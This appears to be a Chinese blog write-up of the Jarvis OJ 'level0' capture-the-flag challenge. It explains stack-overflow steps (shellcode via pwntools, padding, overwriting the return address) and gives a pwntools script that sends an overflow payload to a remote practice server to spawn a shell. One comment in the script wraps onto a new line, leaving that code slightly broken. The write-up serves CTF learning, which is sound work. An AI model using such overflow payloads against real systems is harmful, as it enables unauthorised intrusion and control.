攻防世界和jarvis oj level0

攻防世界和jarvis oj level0个人做题小结

注意:攻防世界和这道题一模一样!!!!!!!

刚开始接触还不太熟悉详情请点下面链接
https://nocbtm.github.io/2018/09/21/oj-level0%E5%92%8Clevel1%E6%80%BB%E7%BB%93/

  • 明白做栈溢出的套路
    (1)找到栈溢出地址(就是搞事情的地址),基本上都是buf的地址,这个地址需要用pwntools中的p32或p64进行转换,(若程序是32位的就用p32)才能用pwntools中的sendline发送到远程连接
    (2)构建shellcode,用一句话就行shellcode = asm(shellcraft.sh())
    (3)构建payload,payload的基本构建:payload=shellcode+’a’*一个长度+p32(buf_addr),次序一定不能乱
    (4)最后就可以发送payload,进行交互,得到shell的控制权,然后ls ,cat flag
  • 做题过程
    (1)首先放进ubuntu中查看他的权限和1位数攻防世界和jarvis oj level0_第1张图片
    (2)然后用IDA打开 使用反编译 找到溢出点在这里插入图片描述
    攻防世界和jarvis oj level0_第2张图片
    vulnerable_function容易被攻击的函数这个地方就是他的溢出点
    然后在找到system的地址
    在这里插入图片描述
    (3)下面是脚本在这里插入代码片
 from pwn import *
 s_addr=0x0000000000400596
 p=remote("pwn2.jarvisoj.com",9881)#用来建立一个远程连接,url或者ip作为地址
                                  然后指明端口,这里也可以仅仅使用本地文件,调试时方便
 p.recvline()
 p.sendline("A"*0x80+'A'*8+p64(s_addr))  
 p.interactive() 

(4)最后是运行脚本
攻防世界和jarvis oj level0_第3张图片

你可能感兴趣的:(栈溢出)